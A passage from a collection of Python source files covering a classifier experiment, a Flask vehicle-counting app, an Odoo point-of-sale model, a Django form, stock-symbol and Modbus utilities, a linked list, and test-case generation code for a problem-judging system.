randomlist:\r\n RandomImages.append(Images[val])\r\n RandomLabels.append(Labels[val])\r\n\r\n tables,priors,runtime=trainNaive(RandomImages,RandomLabels,size,datatype,test)\r\n if(datatype=='d'):\r\n accuracyNaive= testDigitNaive(TestImages,TestLabels,tables,priors,size,runtime)\r\n else:\r\n accuracyNaive = testFaceNaive(TestImages,TestLabels,tables[0],tables[1],priors[0],priors[1],size,runtime)\r\n\r\n weights, bias, runtime = trainPerceptron(RandomImages, RandomLabels, size, datatype,test)\r\n accuracyPercep= testPerceptron(TestImages, TestLabels, weights, bias, size, datatype, runtime)\r\n\r\n return accuracyNaive, accuracyPercep\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n while True:\r\n datatype= input(\"Enter f for Faces or d for Digits.\\n\").lower()\r\n if (datatype != 'f' and datatype != 'd'):\r\n print(\"Improper input Try again.\\n\")\r\n else:\r\n break\r\n\r\n while True:\r\n method = input(\"Enter p for Perceptron, n for Naive Bayes, or k for KNN Classifiers.\\n\").lower()\r\n if (method != 'p' and method != 'n' and method != 'k'):\r\n print(\"Improper input Try again.\\n\")\r\n else:\r\n break\r\n\r\n while True:\r\n size = int(input(\"Enter the percentage of training set images to be used (must be multiple of 10).\\n\")) # Possible 10,20,30,40,50,60,70,80,90,100\r\n if ((size % 10) != 0 or size > 100):\r\n print(\"Improper input Try again.\\n\")\r\n else:\r\n break\r\n\r\n test=\"classification\"\r\n #test = \"accuracy\"\r\n\r\n if(test==\"classification\"):\r\n if (datatype == 'd'):\r\n Image, Labels = load_data(\"Train\", datatype)\r\n TestImage, TestLabel = load_data(\"Test\", datatype)\r\n else:\r\n Image, Labels = load_data(\"Train\", datatype)\r\n TestImage, TestLabel = load_data(\"Test\", datatype)\r\n\r\n if(method==\"n\"):\r\n table, priors, runtime = trainNaive(Image,Labels, size,datatype,test)\r\n if(datatype=='d'):\r\n testDigitNaive(TestImage, TestLabel, table, priors, size, runtime)\r\n else:\r\n testFaceNaive(TestImage,TestLabel,table[0],table[1],priors[0],priors[1],size,runtime)\r\n elif(method==\"p\"):\r\n weights, bias, runtime = trainPerceptron(Image, Labels, size,datatype,test)\r\n testPerceptron(TestImage, TestLabel, weights, bias, size,datatype, runtime)\r\n else:\r\n temp1 = map(img_vec, Image)\r\n k_dImages = list(temp1)\r\n temp2 = map(img_vec, TestImage)\r\n k_dTestImages = list(temp2)\r\n\r\n train_images = np.asarray(k_dImages)\r\n train_labels = 
np.asarray(Labels)\r\n        test_images = np.asarray(k_dTestImages)\r\n        test_labels = np.asarray(TestLabel)\r\n\r\n        testKNN(train_images,train_labels, test_images,test_labels,size)\r\n    else:\r\n        dImage, dLabels = load_data(\"Train\", \"d\")\r\n        dTestImage, dTestLabel = load_data(\"Test\", \"d\")\r\n        fImage, fLabels = load_data(\"Train\", \"f\")\r\n        fTestImage, fTestLabel = load_data(\"Test\", \"f\")\r\n\r\n        for si in range(10,110,10):\r\n            # reset the accumulators for each training-set size so the printed stats match the header\r\n            digitnacc = []\r\n            facenacc = []\r\n            digitpacc = []\r\n            facepacc = []\r\n            for i in range(5):\r\n                dnaive,dpercep=AccuracyPrediction(dImage,dLabels,dTestImage,dTestLabel,si,\"d\",test)\r\n                fnaive,fpercep=AccuracyPrediction(fImage, fLabels, fTestImage, fTestLabel, si, \"f\",test)\r\n                digitnacc.append(dnaive)\r\n                facenacc.append(fnaive)\r\n                digitpacc.append(dpercep)\r\n                facepacc.append(fpercep)\r\n\r\n            print(\"For Digit Classification and Training Set Size: \" + str(si) + \"%\")\r\n            print(\"Mean: \" + str(mean(digitnacc)) + \"%\")\r\n            print(\"Standard Deviation: \" + str(stdev(digitnacc)) + \"%\")\r\n\r\n            print(\"For Face Classification and Training Set Size: \" + str(si) + \"%\")\r\n            print(\"Mean: \" + str(mean(facenacc)) + \"%\")\r\n            print(\"Standard Deviation: \" + str(stdev(facenacc)) + \"%\")\r\n\r\n            print(\"For Digit Classification and Training Set Size: \" + str(si) + \"%\")\r\n            print(\"Mean: \" + str(mean(digitpacc)) + \"%\")\r\n            print(\"Standard Deviation: \" + str(stdev(digitpacc)) + \"%\")\r\n\r\n            print(\"For Face Classification and Training Set Size: \" + str(si) + \"%\")\r\n            print(\"Mean: \" + str(mean(facepacc)) + \"%\")\r\n            print(\"Standard Deviation: \" + str(stdev(facepacc)) + \"%\")","sub_path":"Classification_Project.py","file_name":"Classification_Project.py","file_ext":"py","file_size_in_byte":18381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"350089655","text":"from flask import Flask, render_template, request, url_for, Response, send_file, after_this_request\nfrom flask_cors import CORS\nimport subprocess, requests, os, shutil, time\nfrom datas.location import get_full_loc, get_id\nfrom datas.download import download_vid_file\n\nmodel_dir = 'datas/yolov5x.pt'\napp = Flask(__name__)\nCORS(app)\n\nglobal CONF\nCONF = 0.5\n\ndef count_cnt(url):\n    f = open(url, 'r')\n    data = f.read()\n    car_cnt = set()\n    for i in data.split('\\n'):\n        line = i.split(' ')\n        line = list(map(int, line[:-2]))\n        if len(line) == 0:\n            break\n        car_cnt.add(line[1])\n    return len(car_cnt)\n    \n\ndef log_subprocess_output(pipe):\n    for line in iter(pipe.readline, b''):\n        print('S :', str(line)[2:-5])\n\ndef download(url, file_name):\n    with open(file_name, \"wb\") as file:\n        response = requests.get(url)\n        file.write(response.content)\n\ndef make_archive(source, destination):\n    archive_from = os.path.dirname(source)\n    archive_to = os.path.basename(source.strip(os.sep))\n    shutil.make_archive('data', 'zip', archive_from, archive_to)\n    shutil.move('%s.%s'%('data', 'zip'), destination)\n\n@app.route('/')\ndef f1():\n    loc_list = get_full_loc()\n    return render_template('main.html', loc_list=loc_list, enumerate=enumerate, get_id=get_id, CONF=CONF)\n\n@app.route('/download', methods=['GET'])\ndef zip_download():\n    try:\n        os.remove('static/data.zip')\n    except:\n        print('Remove Fail')\n    make_archive('static/vid', 'static/')\n    return send_file('static/data.zip', mimetype='application/zip', attachment_filename='data.zip', as_attachment=True)\n\n@app.route('/setting', methods=['POST'])\ndef setting():\n    global CONF  # rebind the module-level threshold read by f1() and f3()\n    CONF = 
float(request.form['CONF'])\n    print('CONF value changed!', CONF)\n    return Response(status=200)\n\n@app.route('/load_pre', methods=['POST'])\ndef f3():\n    id = request.form['id']\n    file = download_vid_file(id)\n    print('----- CCTV Video Download -----')\n    file_list = list(os.listdir('static/vid/processed/'))\n    file_len = str(int(len(file_list) / 2) + 1)\n    save_url = 'static/vid/cache/%s' % (id + '-' + file_len + '.mp4')\n    download(file, save_url)\n    print('----- DeepSort Predict -----')\n    configs_text = '--output ../static/vid/processed/ --save-vid --save-txt --conf-thres %f --source %s --yolo_weights %s' % (CONF, '../' + (save_url), '../' + model_dir) \n    #COCO Datasets \n    configs_text += ' --classes 2 3 5 7'\n    process = subprocess.Popen(['python', 'track.py'] + configs_text.split(' '), cwd='Yolov5_DeepSort_Pytorch', stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=False)\n    with process.stdout:\n        log_subprocess_output(process.stdout)\n    try:\n        car_cnt = count_cnt('static/vid/processed/%s' % (id + '-' + file_len + '.txt'))\n    except:\n        car_cnt = 0\n\n    time.sleep(5)\n    return {'res' : url_for('static', filename='vid/processed/%s' % (id + '-' + file_len + '.mp4')), 'cnt':car_cnt}\n\n\nif __name__ == '__main__':\n    app.run('0.0.0.0', port=80, debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"262168788","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import fields, models, api, _\r\nfrom odoo.exceptions import except_orm\r\nfrom odoo.tools import float_round\r\n\r\n\r\nclass PosUseServiceLine(models.Model):\r\n    _name = 'pos.use.service.line'\r\n\r\n    name = fields.Char(\"Name\")\r\n    lot_id = fields.Many2one('stock.production.lot', \"Lot\")\r\n    lot_line_id = fields.Many2one('stock.production.lot.line', \"Lot Line\")\r\n    service_id = fields.Many2one('product.product', \"Service\")\r\n    total_count = fields.Float(\"Total Count\")\r\n    paid_count = fields.Float(\"Paid Count\")\r\n    used_count = fields.Float('Used Count')\r\n    qty = fields.Float(\"Qty\", default=1)\r\n    employee_ids = fields.Many2many('hr.employee', 'employee_pos_use_service_line_rel', 'use_service_line_id', 'emp_id', string='Employees')\r\n    price_unit = fields.Float(\"Price Unit\")\r\n    discount = fields.Float(\"Discount(%)\")\r\n    amount = fields.Float(\"Amount Total\", compute=\"_compute_amount_total\", store=True)\r\n    use_service_id = fields.Many2one('pos.use.service', \"use Service\")\r\n    order_line_id = fields.Many2one('pos.order.line', \"Order Line\")\r\n    revenue_rate = fields.Float(\"Revenue Rate\")\r\n\r\n    @api.onchange('qty','service_id')\r\n    def _product_qty_change(self):\r\n        if not self.use_service_id.pricelist_id:\r\n            raise except_orm('Warning!', (\"Please select a pricelist before creating this record!\"))\r\n        if not self.service_id:\r\n            return\r\n        product = self.service_id.with_context(\r\n            lang=self.use_service_id.partner_id.lang,\r\n            partner=self.use_service_id.partner_id.id,\r\n            quantity=self.qty,\r\n            date=self.use_service_id.date,\r\n            pricelist=self.use_service_id.pricelist_id.id,\r\n            uom=self.service_id.uom_id.id,\r\n        )\r\n        self.price_unit = product.price\r\n\r\n\r\n    @api.onchange('service_id', 'price_unit', 'qty')\r\n    def _onchange_discount(self):\r\n        if not self.use_service_id.pricelist_id:\r\n            raise except_orm('Warning!', (\"Please select a pricelist before creating this record!\"))\r\n        if not (self.service_id and\r\n                self.use_service_id.partner_id and self.use_service_id.pricelist_id and\r\n                self.use_service_id.pricelist_id.discount_policy == 
'without_discount'):\r\n            return\r\n        if self.qty < 0:\r\n            raise except_orm('Warning!', (\"Quantity must be greater than 0. Please check again\"))\r\n        if self.use_service_id.type == 'card':\r\n            if self.lot_id.product_id.product_tmpl_id.x_card_type == 'service_card':\r\n                if self.paid_count - self.used_count < self.qty:\r\n                    raise except_orm('Warning!', (\"You cannot use more than the remaining count\"))\r\n            if self.lot_id.product_id.product_tmpl_id.x_card_type == 'keep_card':\r\n                if self.used_count + self.qty > self.total_count:\r\n                    raise except_orm('Warning!', (\"You cannot use more than the remaining count\"))\r\n        self.discount = 0.0\r\n        product = self.service_id.with_context(\r\n            lang=self.use_service_id.partner_id.lang,\r\n            partner=self.use_service_id.partner_id.id,\r\n            quantity=self.qty,\r\n            date=self.use_service_id.date,\r\n            pricelist=self.use_service_id.pricelist_id.id,\r\n            uom=self.service_id.uom_id.id,\r\n        )\r\n        product_context = dict(self.env.context, partner_id=self.use_service_id.partner_id.id, date=self.use_service_id.date, uom=self.service_id.uom_id.id)\r\n\r\n        price, rule_id = self.use_service_id.pricelist_id.with_context(product_context).get_product_price_rule(self.service_id, self.qty or 1.0,\r\n                                                                                                              self.use_service_id.partner_id)\r\n        new_list_price, currency = self.with_context(product_context)._get_real_price_currency(product, rule_id, self.qty, self.service_id.uom_id,\r\n                                                                                               self.use_service_id.pricelist_id.id)\r\n\r\n        if new_list_price != 0:\r\n            if self.use_service_id.pricelist_id.currency_id != currency:\r\n                # we need new_list_price in the same currency as price, which is in the SO's pricelist's currency\r\n                new_list_price = currency._convert(\r\n                    new_list_price, self.use_service_id.pricelist_id.currency_id,\r\n                    self.use_service_id.company_id, self.use_service_id.date or fields.Date.today())\r\n            discount = (new_list_price - price) / new_list_price * 100\r\n            if discount > 0:\r\n                discount = float_round(discount, precision_rounding=0.01, rounding_method='HALF-UP')\r\n                self.discount = discount\r\n\r\n    def _get_real_price_currency(self, product, rule_id, qty, uom, pricelist_id):\r\n        \"\"\"Retrieve the price before applying the pricelist\r\n        :param obj product: object of current product record\r\n        :param float qty: total quantity of product\r\n        :param tuple price_and_rule: tuple(price, suitable_rule) coming from pricelist computation\r\n        :param obj uom: unit of measure of current order line\r\n        :param integer pricelist_id: pricelist id of sales order\"\"\"\r\n        PricelistItem = self.env['product.pricelist.item']\r\n        field_name = 'lst_price'\r\n        currency_id = None\r\n        product_currency = None\r\n        if rule_id:\r\n            pricelist_item = PricelistItem.browse(rule_id)\r\n            if pricelist_item.pricelist_id.discount_policy == 'without_discount':\r\n                while pricelist_item.base == 'pricelist' and pricelist_item.base_pricelist_id and pricelist_item.base_pricelist_id.discount_policy == 'without_discount':\r\n                    price, rule_id = pricelist_item.base_pricelist_id.with_context(uom=uom.id).get_product_price_rule(product, qty,\r\n                                                                                                                     self.use_service_id.partner_id)\r\n                    pricelist_item = PricelistItem.browse(rule_id)\r\n\r\n            if pricelist_item.base == 'standard_price':\r\n                field_name = 'standard_price'\r\n            if pricelist_item.base == 'pricelist' and pricelist_item.base_pricelist_id:\r\n                field_name = 'price'\r\n                product = product.with_context(pricelist=pricelist_item.base_pricelist_id.id)\r\n                product_currency = pricelist_item.base_pricelist_id.currency_id\r\n            currency_id = pricelist_item.pricelist_id.currency_id\r\n\r\n        product_currency = product_currency or (product.company_id and product.company_id.currency_id) or 
self.use_service_id.company_id.currency_id\r\n        if not currency_id:\r\n            currency_id = product_currency\r\n            cur_factor = 1.0\r\n        else:\r\n            if currency_id.id == product_currency.id:\r\n                cur_factor = 1.0\r\n            else:\r\n                cur_factor = currency_id._get_conversion_rate(product_currency, currency_id, self.use_service_id.company_id, self.use_service_id.date)\r\n\r\n        return product[field_name] * cur_factor, currency_id\r\n\r\n    @api.depends('qty', 'price_unit', 'discount')\r\n    def _compute_amount_total(self):\r\n        for line in self:\r\n            if line.use_service_id.type == 'service':\r\n                line.amount = line.qty * line.price_unit * (1 - (line.discount / 100))\r\n            else:\r\n                line.amount = 0.0  # compute methods must assign a value for every record; default to zero\r\n                if line.lot_id.product_id.product_tmpl_id.x_card_type == 'keep_card':\r\n                    if line.paid_count < line.used_count + line.qty:\r\n                        line.amount = (line.qty + line.used_count - line.paid_count) * line.price_unit * (1 - (line.discount / 100))","sub_path":"izi_pos_use_service/models/pos_use_service_line.py","file_name":"pos_use_service_line.py","file_ext":"py","file_size_in_byte":7743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"365348716","text":"from django.forms import ModelForm, TextInput, Textarea, EmailInput, URLInput\nfrom .models import Comment\n\n\nclass CommentForm(ModelForm):\n    class Meta:\n        model = Comment\n        fields = ['author', 'author_mail', 'author_url', 'body']\n        widgets = {\n            'author': TextInput(attrs={'id': 'author',\n                                       'class': 'form-control input-control clearfix',\n                                       'placeholder': 'Nickname*'\n                                       }),\n            'author_mail': EmailInput(attrs={'id': 'mail',\n                                             'class': 'form-control input-control clearfix',\n                                             'placeholder': 'Email*',\n                                             }),\n            'author_url': URLInput(attrs={'id': 'url',\n                                          'class': 'form-control input-control clearfix',\n                                          'placeholder': 'Blog URL (http://)'}),\n            'body': Textarea(attrs={'id': 'textarea',\n                                    'class': 'form-control',\n                                    'placeholder': 'Say something'\n                                    })\n        }\n","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"362226466","text":"# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport datetime as dt\r\n\r\nimport dill\r\nimport pandas as pd\r\n\r\ndef write_to_ser(obj, fileName):\r\n\toutFile = open(fileName, 'wb')\r\n\tdill.dump(obj, outFile)\r\n\r\n\toutFile.close()\r\n\r\ndef read_from_ser(fileName):\r\n\tinFile = open(fileName, 'rb')\r\n\tobj = dill.load(inFile)\r\n\r\n\treturn obj\r\n\r\ndef get_DJI_symbols():\r\n\tf = open('data/symbols_files/DJI_symbols.dat', 'w')\r\n\tDJI_list = pd.read_html('https://en.wikipedia.org/wiki/Dow_Jones_Industrial_Average')\r\n\r\n\tfor symbol in DJI_list[1]['Symbol']:\r\n\t\tf.write(symbol + '\\n')\r\n\r\n\tf.close()\r\n\r\ndef get_GSPC_symbols():\r\n\tf = open('data/symbols_files/GSPC_symbols.dat', 'w')\r\n\tGSPC_list = pd.read_html('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\r\n\r\n\tfor symbol in GSPC_list[0]['Symbol']:\r\n\t\tf.write(symbol + '\\n')\r\n\r\n\tf.close()\r\n\r\ndef get_GDAXI_symbols():\r\n\tf = open('data/symbols_files/GDAXI_symbols.dat', 'w')\r\n\tGDAXI_list = pd.read_html('https://en.wikipedia.org/wiki/DAX')\r\n\r\n\tfor symbol in GDAXI_list[2]['Ticker symbol']:\r\n\t\tf.write(symbol + '.DE\\n')\r\n\r\n\tf.close()\r\n\r\ndef open_symbols_file(index):\r\n\tf = open('data/symbols_files/' + index + '_symbols.dat', 'r')\r\n\tsymbols = [symbol.strip() for symbol in f]\r\n\r\n\tf.close()\r\n\r\n\treturn symbols\r\n\r\ndef open_sectors_file(sector):\r\n\tf = open('GSPC_sectors\\\\' + sector + '.dat', 
'r')\r\n\tsymbols = [symbol.strip() for symbol in f]\r\n\r\n\tf.close()\r\n\r\n\treturn symbols\r\n\r\ndef get_directory_size(directory, MB = True):\r\n\ttotal = 0\r\n\r\n\tfor dirpath, dirnames, filenames in os.walk(directory):\r\n\t\tfor f in filenames:\r\n\t\t\tfp = os.path.join(dirpath, f)\r\n\r\n\t\t\ttotal += os.path.getsize(fp)\r\n\r\n\tif MB:\r\n\t\treturn total / (1024 ** 2)\r\n\telse:\r\n\t\treturn total\r\n\r\ndef get_current_time():\r\n\treturn dt.datetime.now().strftime(\"%H:%M:%S\")\r\n\r\ndef progress_bar(iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\r\n\tpercent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\r\n\tfilled_length = int(length * iteration // total)\r\n\tbar = fill * filled_length + '-' * (length - filled_length)\r\n\r\n\tprint('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end = '\\r')\r\n\r\n\tif iteration == total:\r\n\t\tprint()\r\n\r\ndef main():\r\n\tpass\r\n\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"231009035","text":"#!/bin/python\n\nfrom pyModbusTCP.server import ModbusServer, DataBank\nfrom time import sleep\nfrom random import uniform\nimport logging\nimport sys\n#Create an instance of ModbusServer\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\n\ntry:\n logging.info(\"Iniciando\")\n server = ModbusServer(host=\"localhost\", port=5020)\n logging.info(\"Start server...\")\n #print(\"Start server...\")\n server.start()\n logging.info(\"Server is online\")\n print(\"Server is online\")\n state=[0]\n while True:\n DataBank.set_words(0,[int(uniform(0,100))])\n if state != DataBank.get_words(1):\n state = DataBank.get_words(1)\n print(\"Value of Registers 1 has changed to =\" + str(state))\n sleep(0.5)\n \nexcept Exception as e:\n logging.info(\"Error: {0}\".format(str(e)))\n print(\"Shutdown server ....\")\n server.stop()\n print(\"Server is offline\")","sub_path":"app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"301429380","text":"import sys\nimport types\nfrom memstor.memstor import MemStor, Data\nfrom common import logger\n\nclass CommonWorkerException(Exception):\n pass\n\nclass Worker(object):\n __base_class__=\"Worker\"\n __name__=\"Worker\"\n \n def __init__(self):\n logger.info(\"New worker \"+self.__name__)\n self._memstor=MemStor()\n #register meta\n if hasattr(self,\"__meta__\"):\n self.register_meta(self.__meta__)\n else:\n logger.error(\"Workder must have __meta__ defined for charting.\")\n raise CommonWorkerException(__name__,\"Workder must have __meta__ defined for charting.\")\n #init\n if hasattr(self,\"initialize\"):\n logger.info(\"Initialize worker \"+self.__name__)\n self.initialize()\n \n def register_meta(self,meta):\n logger.info(\"Register Meta for Worker\"+self.__name__)\n \n if not self._memstor.HasKey('Metadata'):\n self._memstor.AddNewKey('Metadata')\n current_meta={}\n else:\n current_meta=self._memstor.ReadData('Metadata')[0]\n \n key=self.__name__\n if meta.has_key('_values') and meta.has_key('_label'):\n if(type(meta['_values'])==types.StringType):\n meta['_values']=(meta['_values'],)\n if(type(meta['_values'])==types.TupleType):\n current_meta[key]=meta\n 
self._memstor.AddNewData('Metadata',Data(current_meta,exclusive=True))\n            else:\n                logger.error(\"__meta__,_values must be tuple.\")\n                raise CommonWorkerException(__name__,\"__meta__,_values must be tuple.\")\n        else:\n            logger.error(\"__meta__ must have _label and _values defined\")\n            raise CommonWorkerException(__name__,\"__meta__ must have _label and _values defined\")\n    \n    def set_memstor_key(self,memstor_key):\n        \"\"\"initialize(self,memstor_key)\"\"\"\n        self._memstor_key=memstor_key\n        logger.info(self.__name__+\" setting memstor key to \"+ self._memstor_key)\n    \n    def record(self):\n        if hasattr(self,\"_data\"):\n            logger.info(self.__name__+\" is storing Data: \"+str(self._data))\n            \n            if not self._memstor.HasKey(self.__name__):\n                self._memstor.AddNewKey(self.__name__)\n            self._memstor.AddNewData(self.__name__,Data(self._data))\n\n    def __finalize__(self):\n        pass\n\n\nclass Clerk(Worker):\n    def record(self):\n        \"\"\"WILL NOT RECORD\"\"\"\n        \n    def register_meta(self,meta):\n        \"\"\"WILL NOT REGISTER\"\"\"","sub_path":"worker/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"494059401","text":"import random\r\n\r\nclass element:\r\n    def __init__(self, next=None, prev=None,value=None):\r\n        self.next = next\r\n        self.value = value\r\n        self.prev = prev\r\n\r\nclass LinkedList:\r\n    def __init__(self):\r\n        self.first = None\r\n        self.last = None\r\n        self.length = 0\r\n\r\n    def __str__(self):\r\n        if self.first != None:\r\n            current = self.first\r\n            out = 'List [\n' +str(current.value) +'\n'\r\n            while current.next != None:\r\n                current = current.next\r\n                out += str(current.value) + '\n'\r\n            return out + ']'\r\n        return 'Your list is empty :('\r\n\r\n    def clear(self):\r\n        self.__init__()\r\n\r\n    #append an element at the tail\r\n    def addlast(self, x):\r\n        if x!=None:\r\n            self.length+=1\r\n            if self.first == None:\r\n                self.last = element(None,None,x)\r\n                self.first = self.last\r\n            else:\r\n                self.last.next = element(None,None,x)\r\n                self.last.next.prev=self.last\r\n                self.last=self.last.next\r\n        else:\r\n            print('you are trying to insert an empty value')\r\n\r\n    #prepend an element at the head\r\n    def addfirst(self, x):\r\n        if x!=None:\r\n            self.length+=1\r\n            if self.first == None:\r\n                self.last = element(None,None,x)\r\n                self.first = self.last\r\n            else:\r\n                self.first.prev = element(None,None,x)\r\n                self.first.prev.next=self.first\r\n                self.first=self.first.prev\r\n        else:\r\n            print('you are trying to insert an empty value')\r\n\r\n\r\n    #symmetric removal of the first and last elements\r\n    def killfirst(self):\r\n        if self.first!=None:\r\n            self.length-=1\r\n            if self.first.next!=None:\r\n                self.first.next.prev=None\r\n                self.first=self.first.next\r\n            else:\r\n                #removing the only element empties the list\r\n                self.first=None\r\n                self.last=None\r\n\r\n    def killlast(self):\r\n        if self.last!=None:\r\n            self.length-=1\r\n            if self.last.prev!=None:\r\n                self.last.prev.next=None\r\n                self.last=self.last.prev\r\n            else:\r\n                self.first=None\r\n                self.last=None\r\n\r\n    def randomlist(self,dlina,max):\r\n        for z in range(dlina):\r\n            self.addfirst(random.randrange(max))\r\n\r\n\r\n\r\nl=LinkedList()\r\nl.addfirst(1)\r\nl.addlast(2)\r\nl.addfirst(3)\r\nl.addlast(4)\r\nprint(l)\r\nl.killlast()\r\nl.killlast()\r\nprint(l)\r\nl.clear()\r\nprint(l)\r\nl.randomlist(20,100)\r\nprint(l)\r\nl.killfirst()\r\nl.killfirst()\r\nprint(l)\r\n","sub_path":"тип_данных.py","file_name":"тип_данных.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"184068528","text":"import json\nimport os\nimport re\nimport 
shutil\nimport zipfile\nfrom datetime import datetime\n\nimport io\n\nimport chardet\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.files.base import ContentFile, File\nfrom django.db import transaction\nfrom django.db.models import Max\nfrom django.http import Http404\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseBadRequest\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.urls import reverse\nfrom django.views import View\nfrom django.views.generic import CreateView\nfrom django.views.generic import FormView\nfrom django.views.generic import ListView\nfrom django.views.generic import TemplateView\nfrom django.views.generic import UpdateView\nfrom os import path\n\nfrom django_q.tasks import async_task\n\nfrom polygon.models import Case, Program, Task\nfrom polygon.problem2.forms import CaseUpdateForm, CaseCreateForm, CaseUpdateInfoForm\nfrom polygon.problem2.runner import Runner\nfrom polygon.problem2.runner.exception import CompileError\nfrom polygon.problem2.views.base import ProblemRevisionMixin\nfrom utils import random_string\nfrom utils.download import respond_generate_file\nfrom utils.file_preview import sort_data_list_from_directory, special_sort\n\n\nclass UpdateManager(object):\n def __init__(self, object, revision):\n self.object = object\n self.revision = revision\n\n def __enter__(self):\n if self.object.revision_set.all().count() > 1:\n # the case is related to a revision other than this one\n with transaction.atomic():\n # only for cases now\n self.revision.cases.remove(self.object)\n self.object.parent_id = self.object.pk\n self.object.pk = None\n self.object.save()\n self.revision.cases.add(self.object)\n return self.object\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.object.save()\n\n\nclass CaseManagementTools(object):\n white_space_reg = re.compile(r'[\\x00-\\x20\\s]+')\n\n @staticmethod\n def read_by_formed_lines(fileobj):\n for line in fileobj:\n yield ' '.join(CaseManagementTools.white_space_reg.split(line.strip()))\n\n @staticmethod\n def well_form_text(text):\n stream = io.StringIO(text.strip())\n out_stream = io.StringIO()\n for line in CaseManagementTools.read_by_formed_lines(stream):\n out_stream.writelines([line, '\\n'])\n out_stream.seek(0)\n return out_stream.read()\n\n @staticmethod\n def well_form_binary(binary):\n try:\n encoding = chardet.detect(binary).get('encoding', 'utf-8')\n return CaseManagementTools.well_form_text(binary.decode(encoding))\n except:\n return ''\n\n @staticmethod\n def reformat(txt, well_form_policy=True):\n if isinstance(txt, str):\n txt = txt.encode()\n if well_form_policy:\n return CaseManagementTools.well_form_binary(txt)\n else: return txt\n\n @staticmethod\n def reformat_file(file_path, well_form_policy=True):\n if well_form_policy:\n with open(file_path, \"rb+\") as file_obj:\n file_obj.seek(0)\n ret = CaseManagementTools.reformat(file_obj.read())\n file_obj.seek(0)\n file_obj.truncate(0)\n file_obj.write(ret.encode())\n\n @staticmethod\n def naturalize_order(revision, case_set):\n with transaction.atomic():\n for idx, case in enumerate(case_set, start=1):\n if idx != case.case_number:\n with UpdateManager(case, revision) as t:\n t.case_number = idx\n\n @staticmethod\n def generate_cases(revision, commands):\n \"\"\"\n report: [\n {\n success: True / False\n error: ...\n case_number: 1\n detail: ...\n }, { ... 
}, ...\n ]\n \"\"\"\n generators = {}\n current_task = Task.objects.create(revision=revision, abstract=\"GENERATE CASES\")\n report = []\n for command_string in commands:\n ret = {\"command\": command_string}\n command = command_string.split()\n program_name, program_args = command[0], command[1:]\n try:\n if program_name not in generators:\n program = revision.programs.get(name=program_name, tag=\"generator\")\n generators[program_name] = Runner(program)\n elif isinstance(generators[program_name], CompileError):\n raise generators[program_name]\n runner = generators[program_name]\n if revision.cases.all().count():\n case_number = revision.cases.all().aggregate(Max(\"case_number\"))[\"case_number__max\"] + 1\n else: case_number = 1\n new_case = Case(create_time=datetime.now(),\n description=\"Gen \\\"%s\\\"\" % command_string,\n case_number=case_number)\n new_case.input_file.save(\"in_\" + random_string(), ContentFile(b\"\"), save=False)\n new_case.output_file.save(\"out_\" + random_string(), ContentFile(b\"\"), save=False)\n running_result = runner.run(args=program_args, stdout=new_case.input_file.path,\n max_time=revision.time_limit * 5 / 1000,\n max_memory=revision.memory_limit * 3)\n CaseManagementTools.reformat_file(new_case.input_file.path, revision.well_form_policy)\n new_case.save_fingerprint(revision.problem_id)\n ret[\"case_number\"] = case_number\n with transaction.atomic():\n new_case.save()\n revision.cases.add(new_case)\n ret.update(case_number=case_number,\n success=running_result[\"verdict\"] == \"OK\",\n detail=running_result,\n generated=new_case.input_preview)\n except (Program.MultipleObjectsReturned, Program.DoesNotExist):\n ret.update(success=False,\n error=\"There should be exactly one program tagged 'generator' that fits the command.\")\n except CompileError as e:\n generators[program_name] = e\n ret.update(success=False, error=e.error)\n report.append(ret)\n current_task.status = -2\n current_task.report = json.dumps(report)\n current_task.status = 0 if all(map(lambda r: r[\"success\"], report)) else -1\n current_task.save()\n\n @staticmethod\n def run_case_output(revision, case_set, solution):\n \"\"\"\n report: similar to generating cases, [{ }, { }, ... 
{ }]\n        \"\"\"\n        current_task = Task.objects.create(revision=revision, abstract=\"RUN OUTPUT, %d cases\" % len(case_set))\n        try:\n            runner = Runner(solution)\n            result = []\n            failed = False\n            for case in case_set:\n                if case.output_lock: continue  # output content protected\n                with UpdateManager(case, revision) as case:\n                    case.output_file.save(\"out_\" + random_string(), ContentFile(b''), save=False)\n                    run_result = runner.run(stdin=case.input_file.path, stdout=case.output_file.path,\n                                            max_time=revision.time_limit * 3 / 1000,\n                                            max_memory=revision.memory_limit * 2)\n                    CaseManagementTools.reformat_file(case.output_file.path, revision.well_form_policy)\n                    case.save_fingerprint(revision.problem_id)\n                with transaction.atomic():\n                    case.save()\n                result.append({\n                    \"case_number\": case.case_number,\n                    \"success\": run_result[\"verdict\"] == 